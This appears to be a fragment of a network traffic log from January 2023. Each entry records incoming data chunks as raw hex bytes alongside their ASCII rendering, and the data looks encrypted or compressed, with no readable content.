                                                                                                                                                                                    2023-01-05 07:58:36 UTC11299INData Raw: 71 4e 2b 73 f3 52 43 13 1c 49 b9 a9 ba d5 f5 15 c5 c2 77 1e 1a 12 d0 64 3a 02 6c a8 bb 26 d1 69 6e 44 ce cc 7f 8b ad 84 11 63 bb 06 9a 42 5d 5f 6d 0e 66 83 df cf 73 2d 30 73 ab d5 8b 75 39 1e a7 0e c7 a5 26 96 9e a3 97 58 06 4b f1 f5 97 9c 6c fc 6e 0f 11 0b 6e 62 44 19 a7 48 06 06 d4 a9 9b 18 50 79 c5 b2 01 1e ce a8 f6 14 8b 99 7c 35 df 22 48 c0 67 63 80 b5 e2 68 3b 9d b1 1d c2 79 b4 10 00 e8 ce b7 fd b4 92 8c d5 53 43 a2 d5 80 1b 3d 7e 57 1d 7e 7a 5c 06 7f 08 a9 81 69 7c c1 7c f8 ed 9e 16 9d 9f 77 d7 a3 2e 91 e8 8f 9d 72 b3 76 fc 4f 83 07 64 44 35 87 ce cb 5f 2f a6 4b 43 23 e9 d2 b9 f5 6f 0e 47 07 38 12 a9 f3 f7 57 09 0e 92 e8 86 cb be d6 bf 97 82 72 95 7c aa 5a 4f a8 8e 71 92 04 79 99 b0 ce aa 74 90 56 25 be a9 6e 1b 9e 51 3d c9 03 7b 52 1b 93 ae d8 e4
                                                                                                                                                                                    Data Ascii: qN+sRCIwd:l&inDcB]_mfs-0su9&XKlnnbDHPy|5"Hgch;ySC=~W~z\i||w.rvOdD5_/KC#oG8Wr|ZOqytV%nQ={R
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11315INData Raw: 70 58 4e 60 d6 7c b3 db c7 99 47 39 55 45 d5 ed 10 5a 5b 42 63 2a 2c 3d fd 8a de 05 44 40 bf 1f 55 57 48 f8 62 85 15 a8 b5 31 2e 11 ef 33 0e bf
                                                                                                                                                                                    Data Ascii: pXN`|G9UEZ[Bc*,=D@UWHb1.3
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11315INData Raw: eb 24 dc ff 88 80 75 c8 7d 2b 45 6c 13 e2 d3 76 ec e2 ad 7e eb e5 bf d1 86 16 8d 0c 1c 3d 8e d2 17 39 05 01 a4 f5 a5 90 9c 59 9a 92 a0 f3 ea 06 f4 bf d7 65 5c 01 78 3b 72 7a 6f 33 7e 47 42 1a 45 7d 9b 89 83 8b ac 3c 2d 81 c1 57 65 af 9a 08 2e c9 89 5c b1 38 d6 e3 a7 c5 fc cd 1f 1c 1e eb 82 b8 09 08 9d 68 a7 95 92 d6 e3 e2 ed fc 30 02 e8 59 0a 6e 6a af 4b 86 be 1d 1b 5c 29 82 6f df 3d da 25 bb 72 a3 0e cd 39 61 11 ba 96 b2 61 33 a7 2b fd ee 84 88 9f 5d ea 1e de 84 09 22 ea 0e 24 57 39 6d b8 9e bb a0 1f d6 bb 11 fe 1f 0a f3 28 de 62 f7 3a 19 94 a4 1c 54 71 b1 b0 7a 0d 8c d1 1f 3d 3c 66 19 d0 6b a8 97 bb 75 fd 64 ae 22 e0 ab 70 87 44 e7 f7 73 e1 84 a8 ae 5c ce 85 d3 9d b6 dd 95 6d ad 40 3e 93 18 9e ee 71 cd 57 c3 6b a6 97 1c 11 43 99 82 20 76 ed a0 d4 eb 3c
                                                                                                                                                                                    Data Ascii: $u}+Elv~=9Ye\x;rzo3~GBE}<-We.\8h0YnjK\)o=%r9aa3+]"$W9m(b:Tqz=<fkud"pDs\m@>qWkC v<
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11331INData Raw: 17 bd a2 47 15 69 be 2c 8f 38 b8 b7 2e 67 03 ea 63 26 a3 17 82 41 37 5c 6e 19 16 4e 81 bd a2 f8 7e 5b 4a 64 73 24 02 e3 06 4a 77 a6 54 2a aa b7 58 ad 1d 53 0b 1e 4b 75 08 ec a6 fa 99 4f 63 40 d0 6d 41 73 2a 66 8d 79 eb bb 9e 56 6d 0a c3 63 24 c9 a2 07 bc 27 f4 0f a4 63 58 be 63 bd 68 81 53 ae 6c 69 01 8a 10 14 8b b0 45 89 8d 80 b8 3a 4c 11 0f 3a 67 84 5c 3f a7 fb bf fa e4 f8 1e 8f 37 74 89 16 a6 2d bb 2e 2c cd 2d c1 71 6d 68 98 e3 76 67 28 a1 88 91 c7 a2 8e 6a aa 07 b8 5e a8 03 7f ca 4a c2 50 3f 54 9d cb 15 a3 08 66 1f fc 6c 2c f0 54 2b 90 01 94 e9 f1 31 86 bb bd 73 a0 7d c0 cf 0a 79 a7 af c4 35 b8 b7 03 fa 85 be 82 13 63 43 04 c7 4a 2a ee d9 0d 4a 1f c7 f0 4f ff 80 ba eb 3c 7a 5b 53 f0 1d f5 e5 56 81 30 6f 5c 75 26 56 26 ee ae 9f 94 2a 90 e3 63 36 34 b1
                                                                                                                                                                                    Data Ascii: Gi,8.gc&A7\nN~[Jds$JwT*XSKuOc@mAs*fyVmc$'cXchSliE:L:g\?7t-.,-qmhvg(j^JP?Tfl,T+1s}y5cCJ*JO<z[SV0o\u&V&*c64
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11346INData Raw: a2 e0 a9 56 42 7c 0f 43 09 a0 72 2b 38 1b dd 7f 04 1c 3d 99 6e 08 f9 1b 90 a4 e8 9e 27 d2 53 f3 f8 88 3f 15 e5 c4 23 e0 a5 4b 7a b2 bc 58 67 8b 36 e3 d0 8a d0 90 81 01 90 67 ab 04 48 a7 67 c2 01 fa af 6b bf 33 0c dd 86 04 a5 ca 43 ff 7e 80 72 05 d2 07 3e 66 d9 b3 9d 67 aa 28 6c d9 7b de 09 81 9d 63 4d a5 0d ac ee 58 13 a4 58 4c 16 e4 f4 4e d2 0a c4 89 63 ed 4e ef 10 6d 18 57 8d 45 10 9b ac f6 83 87 e6 ad 6f dd 32 e0 17 92 03 27 b0 9b 51 f9 1e 30 cd 67 66 2f 38 52 b2 ad 99 9b 7a 49 a3 fe 0f c6 8a c6 e7 42 4c 18 69 73 3f 6b 9e bb 77 52 31 5d 92 0f 02 2b a1 ca 71 73 da 90 eb 37 af 8e b7 04 66 7a 86 b4 65 b8 a3 f2 40 cd d7 ca a6 3a 42 f4 68 51 70 13 25 09 2d 7d c1 0a 6d 7f bd f7 97 41 f2 55 b3 b3 3c 68 cf 45 da 37 f7 e1 de d5 41 29 2c 5c ff ee f6 21 30 30 8e
                                                                                                                                                                                    Data Ascii: VB|Cr+8=n'S?#KzXg6gHgk3C~r>fg(l{cMXXLNcNmWEo2'Q0gf/8RzIBLis?kwR1]+qs7fze@:BhQp%-}mAU<hE7A),\!00
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11362INData Raw: c6 b1 ec 99 de 32 f2 68 3b a6 5c 3a 87 90 a4 08 08 c3 76 b5 0d bb 07 53 e7 f2 10 40 aa 95 66 61 a3 9c 69 7c 5a 92 53 a7 9f 8c ea 3b 9a 96 52 7d 26 63 64 d2 d3 21 02 8f 5e bc b0 79 42 96 bd bc 95 7a 2c cb c6 d4 80 5f e6 59 e2 be da 6e ba d3 29 ea 6c b9 ce 50 49 43 67 2f a9 f5 9f fa 4b 5e 2a 13 25 c5 af e9 cb 4b a0 f0 c4 2d 65 f8 63 2d c6 1c d8 bd 9f 50 f9 d1 84 49 f9 7b ad 36 fe 55 51 10 d3 ae 72 ce 79 00 e2 b3 5f 84 ae 88 ba 42 08 a8 0d 7f 55 76 c0 e8 97 c3 6d e7 b5 6c f5 f8 7e 5d b3 13 3a 20 8c 9a a4 76 bd 9b 82 90 54 b1 bc a1 63 dc f4 b6 12 a6 84 5d 21 8d 4c 79 90 7b 6f 4b c1 36 86 2a a6 4c dd 89 0d 1e a9 73 0c 36 cb ab 99 2c 30 5a 2a f2 33 dc 23 b2 c9 2c 1a 62 0a 58 aa 6f 22 64 29 88 36 2b 2d e1 41 18 ce 1e 24 56 48 51 27 dc e8 69 78 47 43 dd 02 a1 10
                                                                                                                                                                                    Data Ascii: 2h;\:vS@fai|ZS;R}&cd!^yBz,_Yn)lPICg/K^*%K-ec-PI{6UQry_BUvml~]: vTc]!Ly{oK6*Ls6,0Z*3#,bXo"d)6+-A$VHQ'ixGC
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11378INData Raw: 1d b3 19 b0 a7 33 a0 7b 55 68 55 a5 ce 51 d6 c9 d5 77 a2 50 2a 93 1c e9 e6 12 54 ae a3 4d cd 26 5f 8c 94 e2 aa b4 97 bf f1 4f 9b 06 c9 3a 1c 2d b0 f3 1d ad 23 6d 4d 61 56 ca 2a 74 a4 fb b5 c2 e1 fa 31 c1 c1 5a 89 09 76 a3 7d 60 86 2d 52 46 69 23 12 fb 2e dc 08 ef 43 b0 b7 14 ae 3f d7 df e6 e1 d5 6d 35 74 17 85 89 df 0f 69 2b 84 c2 ec 0d 8d 45 da da a6 7b f1 3b 1d 6d 7b 13 68 b8 6a 49 2f 10 e4 5f 51 29 7e 1c 72 b6 17 fa 23 4d e2 b0 ab 64 29 78 ab 55 67 2c dc 1b 1a 0b 14 27 b6 31 e4 07 e9 8f 07 08 95 20 7b e2 15 07 43 fe c8 ef f8 d0 ae 37 c0 33 db aa 24 5b 06 81 bd 55 27 49 30 c4 53 62 75 3d 81 48 cd 87 07 98 4d 38 36 b7 71 eb 8c af 8c 19 1b f8 35 4e 45 b7 75 44 20 e0 bc 9d 58 37 d5 40 07 57 b4 ec b1 bf b6 1f 45 24 03 ba 80 ba 16 1d 60 b9 e3 a2 92 ef f8 15
                                                                                                                                                                                    Data Ascii: 3{UhUQwP*TM&_O:-#mMaV*t1Zv}`-RFi#.C?m5ti+E{;m{hjI/_Q)~r#Md)xUg,'1 {C73$[U'I0Sbu=HM86q5NEuD X7@WE$`
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11394INData Raw: b4 c4 28 b9 2c 01 a1 ea 4b a4 bb e4 52 f9 22 f6 ec 5b 4c a6 68 62 d3 f2 ed 36 f3 07 a5 40 97 d5 ef 16 5c f7 bc 46 01 c8 e1 8d af 48 05 46 69 91 b2 a9 c5 59 d4 b6 6a 2e 8c fe 3b f8 4a 25 57 86 07 c2 b8 ed 4a e8 8e 90 20 e6 ed 52 1c 16 22 49 72 c6 18 0e 69 e7 77 cb c1 1d 17 83 f4 18 00 0b e6 eb 43 be 49 fc 61 10 6e f4 27 1a 70 2c be 49 aa 98 8d 4a e2 1d 6f f5 7a ce c4 b0 70 88 46 f3 ef 89 b6 54 56 2b 53 f8 19 6b 1d a8 f9 c8 42 2c 56 56 ed f1 76 e0 0b 12 1f 8d 48 e7 50 ac df 17 4f a1 dd fb f2 e0 2d c1 61 b5 a0 ed b8 e0 83 0b f4 ca 43 1e 70 ab eb 6d b1 4a 25 bc 8c 73 f5 ec 60 eb 80 c2 13 b0 0e bc 07 9e d7 2b e9 49 08 32 e3 04 b9 35 90 c7 f4 b4 a2 14 1f 66 eb 9a 74 f5 97 68 3d e0 af 25 7a f4 e3 27 2c ca 9f b3 a0 a6 b8 2a ca f3 0e 39 cf 6c 8e 34 9d 4d 6b 47 65
                                                                                                                                                                                    Data Ascii: (,KR"[Lhb6@\FHFiYj.;J%WJ R"IriwCIan'p,IJozpFTV+SkB,VVvHPO-aCpmJ%s`+I25fth=%z',*9l4MkGe
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11410INData Raw: 63 72 d1 bc 8a fa 5d 12 90 6f 68 c6 c1 4b 28 8e 85 be 0a 71 39 ff d1 38 76 06 f9 13 9b 5e bc d1 e7 50 0a 77 5d 09 89 d6 5f 95 02 05 28 d9 cb 4e f1 bd 3c 80 9d 60 73 67 17 ba 72 ea f5 3e 09 27 81 86 14 ab ca a4 3b e7 03 c1 a8 88 b4 40 96 dd 56 06 74 84 51 19 8f 3d e1 93 dd c2 ea e8 03 89 85 db 12 9e fe b0 e9 b6 e5 19 5f 31 6f 67 52 65 04 85 92 14 bb 99 11 15 3b 7f 3b 41 43 61 f4 4d cf 46 c5 f4 a0 b6 a7 c0 87 63 05 13 45 45 f8 87 e1 01 35 5c f1 bb da 5d d6 8b 46 81 ac ec 57 74 a7 6c 36 ba 2b 5e fe 02 0e 67 ea 6c ff 5b 57 b1 70 ef 99 c5 fe d0 b8 3b ed 00 6a 9f 7b e2 af 65 c9 ce cb 42 ce 0b bd f8 09 4f 78 76 cf 27 82 df 72 0a b6 f1 7c e0 5a 11 7d 37 41 29 58 4d 0c e9 22 80 46 98 c4 17 32 f7 49 68 0a c3 78 53 c9 bd 70 79 7e 55 96 6c ef 04 e2 5c 8b 58 70 d6 d7
                                                                                                                                                                                    Data Ascii: cr]ohK(q98v^Pw]_(N<`sgr>';@VtQ=_1ogRe;;ACaMFcEE5\]FWtl6+^gl[Wp;j{eBOxv'r|Z}7A)XM"F2IhxSpy~Ul\Xp
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11426INData Raw: ba ca 9f 7d 04 6f f6 b7 a8 65 90 6d fd fe b9 25 a5 08 a3 6c e1 af 11 39 bf 26 25 76 3d 19 e8 8c c2 f6 08 c9 cc e3 50 37 76 83 19 85 97 b0 47 10
                                                                                                                                                                                    Data Ascii: }oem%l9&%v=P7vG
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11426INData Raw: a4 33 db 60 78 27 60 31 e1 26 d3 fe c4 ae 7f 5f 74 ee 24 e2 6b e3 be 67 ab 50 bf e3 37 db 55 7f 30 b7 2e a9 52 2d 65 91 aa 71 63 2d 70 a4 f0 ea 56 05 0f e7 04 6e 5b 0f 5b 9c 28 6f 37 c1 15 f3 4c a0 52 22 42 04 77 02 a1 08 ce 6d 31 8b 30 36 89 1d de 7c 6e 71 7c 08 29 12 9a 27 97 3a 53 5d 70 be 98 8d 32 4d 6f f8 92 ff 7b 54 26 87 49 5e ac 72 02 03 bd 67 2e 99 ba 9d b2 af 98 19 c0 96 0a 59 c2 27 c7 1b 9a af 9b 3c f6 c9 7c 19 e3 42 a4 84 98 7a c7 0b 9d 3c b1 b5 14 53 d0 84 7d 6d 85 ef 4d c6 e0 9f ad aa 3a e4 b1 50 de 51 9f 4e 80 b8 83 46 e7 fd da 7e c7 fc c6 a3 1f 1b cd 9a f8 cd 0b c6 61 29 e7 9c bb db ae c9 39 8b 6f 16 7d bd 38 f1 f4 1f 85 35 65 02 a2 c8 8f e9 d8 34 0a ca 7d b9 05 2d f7 27 b3 74 b3 ba cd de 45 26 af 07 af 12 89 7c ec b7 97 6b db 07 6f 69 33
                                                                                                                                                                                    Data Ascii: 3`x'`1&_t$kgP7U0.R-eqc-pVn[[(o7LR"Bwm106|nq|)':S]p2Mo{T&I^rg.Y'<|Bz<S}mM:PQNF~a)9o}85e4}-'tE&|koi3
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11442INData Raw: a1 17 84 41 c7 37 1f a2 db 1b 86 a1 56 04 5f 79 13 38 a5 3e 2b 76 19 6c 0e 47 b2 99 55 30 02 d8 70 09 9c c4 8b 87 0f d8 c7 5a 4c ca 2c 62 46 f8 41 04 65 79 95 e5 a3 5c 38 3a 76 47 ca d4 95 e0 7f cb f1 19 0d f5 66 50 70 00 e7 60 b9 a6 38 4e bf f1 2b f5 7c 08 26 76 27 0a 51 4e 6d 69 aa 92 f4 4f be 8e 57 57 a8 0d 3a 17 49 90 72 d9 8b 4e 36 61 80 82 61 69 4b e8 3d ed e6 ea 4f 72 e3 4c b2 b1 44 6a 34 ef e7 2e c3 1a c5 92 02 1a 21 a2 5d 95 18 0f 28 a4 ff 61 0f 8f b1 3d 20 be 6e 52 e4 9d f5 a3 08 4a 01 7c 4b 96 52 ca 7a 4d e1 bd 15 81 70 f7 b9 1b e1 5a fa a3 76 ca 5d d5 93 ad a9 7b c1 ef a1 6a 47 8c f5 45 c4 6a 83 01 35 62 11 16 56 18 3a 99 b0 95 5b 84 35 cf 68 45 a8 ea 2c b3 3f df 24 78 fc 28 f0 ed 02 5b 35 36 28 a5 ea 0e 63 99 c9 8a b1 1e 1b 53 42 9c 00 82 91
                                                                                                                                                                                    Data Ascii: A7V_y8>+vlGU0pZL,bFAey\8:vGfPp`8N+|&v'QNmiOWW:IrN6aaiK=OrLDj4.!](a= nRJ|KRzMpZv]{jGEj5bV:[5hE,?$x([56(cSB
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11458INData Raw: 1a f6 64 da a9 8d 87 9e af 7a 3c b2 54 3d c4 bc bb 63 e8 33 6b 5d 6d 8f 79 f6 06 c8 fe 62 46 13 10 0c d0 b3 f1 4c 30 e0 b0 16 b4 85 9c 3f f7 9c f0 d9 73 98 64 0f 22 8b 0b ce d7 74 59 af 69 2a 31 8a 84 b0 f9 75 94 ed 4f 62 a1 23 13 e3 ea 3b 6e 16 f7 b9 c0 47 6e c8 71 7c 1a 8f a8 8e 83 8c 19 ad 90 2e b4 62 02 db 2f 2a 3c a2 ac b0 24 57 27 ca e5 fd 7e 5c e3 11 3b ab 06 1a 3a a7 73 30 8a 9c c9 6f 6d 6f 83 5a d5 6f e0 3e 0d 33 01 16 8b e0 e6 a7 aa 9a c2 cc 30 b9 bb 05 08 ae 03 40 27 67 13 9b 5b c8 b2 61 af 26 79 df 1c d0 cb 10 04 db 14 f3 b6 14 de 1b f2 3d c2 58 de 77 d6 ef d9 cd 3e d3 08 7b f9 2f 2c 7e 8d 9c 72 af 50 e4 22 23 f9 75 0c cb 95 7b e3 56 c2 34 af 4f d3 d0 48 40 b2 51 68 88 9b 32 1a 7c 3f 9a 45 75 f3 98 44 60 f4 83 76 59 8a fd e1 72 70 a9 8b 23 6f
                                                                                                                                                                                    Data Ascii: dz<T=c3k]mybFL0?sd"tYi*1uOb#;nGnq|.b/*<$W'~\;:s0omoZo>30@'g[a&y=Xw>{/,~rP"#u{V4OH@Qh2|?EuD`vYrp#o
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11474INData Raw: c1 fc 4f 63 f5 2b ac a3 2a b6 f5 a2 93 55 28 1c 39 42 d9 3d 11 7a 57 b8 48 dc a4 60 b4 ce fc a2 07 c5 02 75 ef 4e f6 4a 92 3b 42 00 56 c1 41 5c 34 45 32 f9 7f dd a1 2e cb e7 cc df 6f 6d 4f df 91 2a 61 64 a9 39 97 ec b9 9e ca 78 31 63 f7 7a 20 2d 2f a3 8a 38 e9 43 5d 48 2b 47 35 8c ba 8f 32 b8 5a 16 94 6e 13 8a 45 d1 7d 6e aa 1a 68 c3 a1 0c a7 e9 92 de 72 1f 2f 9c 26 7a 60 61 88 2e 72 d4 dd 7d 40 88 e3 60 98 fe 8d 70 72 7d 03 af f9 80 5f aa f7 97 66 12 cd 44 16 1f 52 6f 07 b8 56 d9 6b 76 b8 2c f7 25 85 2d 94 0f 0e 0f 68 d9 b3 55 8a e8 cc f8 05 96 2c e9 5a 30 6c 57 0c d1 92 98 11 97 2d 79 43 a2 8f 8e f6 02 a4 d0 a9 67 73 f7 6c f3 7c 7b 1c e4 65 73 a0 82 3b 59 54 29 c9 60 ca f3 81 c5 1a 29 68 d3 c2 50 23 e1 ee ba de c5 14 d0 54 a2 2c 2f 09 b8 eb ad 9a c3 9b
                                                                                                                                                                                    Data Ascii: Oc+*U(9B=zWH`uNJ;BVA\4E2.omO*ad9x1cz -/8C]H+G52ZnE}nhr/&z`a.r}@`pr}_fDRoVkv,%-hU,Z0lW-yCgsl|{es;YT)`)hP#T,/
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11490INData Raw: fc 7c 65 03 e4 a1 47 f5 29 b0 52 83 bf 3f 23 21 b8 3a 32 d3 ef fd f6 02 fa f5 4e e8 37 8d e0 82 18 d2 d3 93 bd 14 45 ff 44 92 9f ac de 0d ec 86 9a 98 10 71 23 28 8c 57 84 95 99 e0 ef 8b c6 28 15 6e 41 3e db f6 8a 54 1f d6 2b f3 54 1f f4 6d b9 5d b4 e2 2f 15 ec 3f 0b fd c8 69 24 5b 52 71 b3 fc 13 f8 16 61 72 ed 45 0c d0 57 a9 6d 3e a6 3e c8 89 30 e2 08 40 1e cb e8 49 0f 31 95 b2 19 33 cb 4a 46 fc 8c f4 ed a3 e7 45 23 1c 5a cd 4b 22 66 0b b2 25 dc 7d 7b af 19 ff 22 24 fd 95 81 59 61 63 fe d9 af f2 e8 fd e9 8d 37 f3 24 3d 4e 04 93 ab 3c 26 8f b5 e0 8f f4 8f 00 21 fa e0 a8 8a fa 14 12 8a a1 d8 76 67 10 24 2e ae 56 37 ab a7 29 d3 f9 cd 6e 10 aa ca 4c ef 77 ba 7a a6 fe ca c2 df eb 04 2b 72 a0 83 99 f8 43 a0 38 52 93 56 fa 05 a0 88 bb bb 21 fc c6 45 cc c4 0d 84
                                                                                                                                                                                    Data Ascii: |eG)R?#!:2N7EDq#(W(nA>T+Tm]/?i$[RqarEWm>>0@I13JFE#ZK"f%}{"$Yac7$=N<&!vg$.V7)nLwz+rC8RV!E
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11506INData Raw: 83 9e e2 af b8 b4 f3 f8 17 d6 bc f6 74 6e 62 7f 0e b6 b3 b6 cf f4 c2 76 56 91 a6 97 fe a6 f1 b3 34 a9 f4 39 ea b9 c9 4e aa b3 cc 4e 37 03 54 95 fb 06 b3 28 a8 5c f9 62 79 6c eb d5 63 90 d9 a0 85 8c 45 9f bb 41 36 f5 8d 68 30 35 45 6f 40 39 9e b1 6f db cd 48 e9 13 64 92 b2 ff 33 78 3e 23 46 ce e9 e7 f2 b5 d9 ff 50 fe 35 6d 8c dc 1f 7d a9 02 af a2 70 f1 25 15 81 59 e3 bd c1 77 2d a7 56 34 e8 f5 50 40 7e 50 e2 8d bc f3 b3 b8 2e e6 32 81 3b 4a 91 a8 02 8c de c3 95 a5 b9 60 11 f9 f7 77 e7 03 35 df 6b e9 c0 b6 6c 11 a7 e0 1c cc 1b 96 f2 e4 34 a8 ca 06 7f cf 2c 02 e0 d4 86 41 55 16 6e 27 7f 8f a2 ff b2 b2 8c 9f 32 3b a4 ff 2f 88 eb ff 5a d4 9b ba a3 ca 25 48 72 6c 5c f1 2e 05 06 25 9c 73 a6 4c 8c 7f 29 ff cf 85 bc 53 36 e8 3f b6 71 c7 b0 64 0e 36 37 7b 6d ee 8f
                                                                                                                                                                                    Data Ascii: tnbvV49NN7T(\bylcEA6h05Eo@9oHd3x>#FP5m}p%Yw-V4P@~P.2;J`w5kl4,AUn'2;/Z%Hrl\.%sL)S6?qd67{m
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11522INData Raw: df da 2b 87 f8 8e 53 58 1c a2 e4 c0 0e ba ed 65 57 6c 47 06 b8 eb 3c fa 07 a3 83 e3 c3 02 73 1a 6c f5 ef b3 c8 0e ff d2 87 db 2d 19 52 f7 49 1a dd cd 20 8e e7 e1 9e f0 6e b0 62 44 97 3f f7 81 bd e5 45 58 49 1e 20 79 e1 9b 0a 48 f7 b5 0d f0 8c d3 9e b9 90 8d 3d 50 91 5b a6 cb e5 10 38 ac f7 bc c4 0d 48 b3 72 04 48 80 6f bc 8d 01 cd b2 b4 6c 1e 3e 6e 45 1c a3 54 a8 01 3a 85 e2 5c aa 7a 35 d0 71 56 0b 9a b2 a7 7a 7b 91 54 b5 41 1b c4 bb 44 c1 9c c0 6b 61 07 69 23 08 fd f6 a7 28 f8 2a d2 f0 43 2c 2f 2f a3 e9 b8 33 6b 8f 42 da 91 02 92 b2 3c 06 1a b9 01 c2 f9 e8 61 ef 76 93 4a 29 e6 28 5e b1 ba 8b 3f a2 a5 af ef 58 b8 d8 5d 13 72 20 28 e7 a5 2b 8a ea 96 8a 85 63 ba cc 38 aa cb 65 c1 12 83 17 fb c1 84 06 a5 9c 3a 28 8d 33 68 c6 75 ea a7 f6 45 7b 5e 12 b1 80 bf
                                                                                                                                                                                    Data Ascii: +SXeWlG<sl-RI nbD?EXI yH=P[8HrHol>nET:\z5qVz{TADkai#(*C,//3kB<avJ)(^?X]r (+c8e:(3huE{^
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11538INData Raw: ed 8d a2 84 2f d9 ef b2 60 e4 f7 5a a6 ff c9 da 60 77 ce ef 29 6f 72 5e 7c 48 82 00 97 24 5b 2a 25 64 98 30 c3 34 f1 37 74 62 23 02 c3 b7 26 bd 26 dd 7b b3 0c 07 c5 ce bc 05 22 1b 1a 8c 41 6d 3e e2 3f 11 bf 6a 28 ad 01 b4 1c 01 46 12 21 26 ab ee d1 1b d7 c1 1e 28 f2 3e 24 bd 0a b2 3a 7d 06 52 3e 67 5a eb b8 0e f0 98 de d8 ed b1 f0 35 78 7e d2 21 ad 44 97 6b 16 9d a7 32 76 c9 9b d1 b7 5a 9b a0 57 6d cd aa 56 be 3c d1 95 d3 7c 06 25 55 c6 4e 7b 66 1e e7 37 e1 47 9a 27 4d f7 a0 57 33 17 7d ca 81 52 29 8b 31 da 24 ad a8 b7 33 6e 02 ff 19 0f f8 ea b5 1f bd f1 e5 5f 71 c5 db dc 67 ce f4 48 05 28 7c f6 dc 17 2e bf 37 3f c3 91 d6 f1 91 07 f7 ed 25 32 db 63 25 5f 47 fe 05 02 c3 40 89 2a 18 ea ac f2 44 95 67 73 38 38 f0 04 cb b0 0c 75 5f 19 01 ec 4e 95 a7 b7 78 ca
                                                                                                                                                                                    Data Ascii: /`Z`w)or^|H$[*%d047tb#&&{"Am>?j(F!&(>$:}R>gZ5x~!Dk2vZWmV<|%UN{f7G'MW3}R)1$3n_qgH(|.7?%2c%_G@*Dgs88u_Nx
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11554INData Raw: 0a 21 59 c8 eb 8d 43 1b 1c b3 aa 04 1f a3 e5 96 89 9c 6c dc 2e a0 26 91 4a 01 36 15 78 8e 19 a2 fd 87 11 66 67 e4 5c 8c 90 41 47 eb 47 7c 67 a5 6f 8b 1e dd 1c 66 95 db 32 1d 98 15 93 31 39 08 b2 2d cd 0e 2d 11 6e 49 01 d6 47 97 3a af bb 72 92 ab ae ed ca b2 7a 5b 10 72 e8 90 f0 ba e2 a4 aa b9 7c fb 03 8e f8 43 38 e4 e7 14 48 dc 8a c7 d0 53 2b 42 bb 6c a6 e7 a3 b3 9b 43 35 69 3d fb 09 bf 1e 78 19 33 39 b3 44 81 18 49 9b fd 0c 37 62 b3 cd 9b dc bd ac 00 01 6a a9 26 ef b1 b0 f5 7a 2b c6 c3 c4 58 d4 8c f8 09 a0 01 86 e3 f5 e2 82 b6 93 04 03 b5 6e 9c d3 ae d6 2b 43 dc c5 40 b0 f0 44 c9 69 0f f3 b1 6e ce 5a aa ab 24 0e c7 dc 89 0c d2 44 13 c9 bc c3 fc 71 5c cd 46 cc 3d 70 78 91 f1 e8 9c 6e 37 93 10 eb c6 c2 29 44 d7 80 49 ae 5d c2 18 db 6e ef 7e 4d 13 e2 ec 2d
                                                                                                                                                                                    Data Ascii: !YCl.&J6xfg\AGG|gof219--nIG:rz[r|C8HS+BlC5i=x39DI7bj&z+Xn+C@DinZ$Dq\F=pxn7)DI]n~M-
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11570INData Raw: b3 11 6c 9e ef 80 19 a3 09 6f 13 f6 e0 f3 19 a0 72 98 ad 45 8f d4 49 85 c3 8b 2d 6a 8a 31 dd d3 73 dd 70 9f 20 c7 4f a9 85 36 03 26 df 86 d3 52
                                                                                                                                                                                    Data Ascii: lorEI-j1sp O6&R
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11570INData Raw: 5a ac 8f 54 e3 e7 18 65 fa e2 7a 62 fd b2 d0 e3 68 3f bf c2 1a 04 74 5e 3b 46 53 24 44 fd 04 2a 22 87 95 0c 83 e4 11 16 a2 a1 46 f7 43 55 17 20 e8 85 98 12 41 7f 7c d9 da 85 58 de 8e 3c 17 e9 07 1c e9 d1 fc e3 11 a4 83 2e 80 5d e8 f2 bf 8c c4 e0 57 96 6d e0 38 03 69 2d d4 e6 3a 36 5c 9b 42 68 eb a1 06 88 47 b6 58 a1 08 ff 73 fa a0 42 4d ab 31 95 e2 d0 d6 b2 d5 0d 6d 2b e7 a4 7c 05 5f 0d 49 65 3d cd cc 24 e5 fc 12 ee 73 2a 4b 29 07 ce d3 53 93 c4 3c 0f dc 3f 5a 29 5c 64 85 93 dc 27 1d 23 8b 7e c8 af 3f 8b 72 7f e3 96 b9 ff cf d9 fc cc 4b 86 9a 47 04 7a 15 c4 a8 a3 ef e8 fe e4 4f e2 b0 68 dc f6 61 3d d2 45 69 62 8f b0 fe 3e c9 e9 77 57 3b 46 61 7e bc 5a c5 e8 a4 13 a9 77 8c 64 3a 29 f7 ab 55 73 c7 e2 27 ad ae f7 28 31 0a 41 ad c8 a4 d3 dc 33 e3 6a 38 92 31
                                                                                                                                                                                    Data Ascii: ZTezbh?t^;FS$D*"FCU A|X<.]Wm8i-:6\BhGXsBM1m+|_Ie=$s*K)S<?Z)\d'#~?rKGzOha=Eib>wW;Fa~Zwd:)Us'(1A3j81
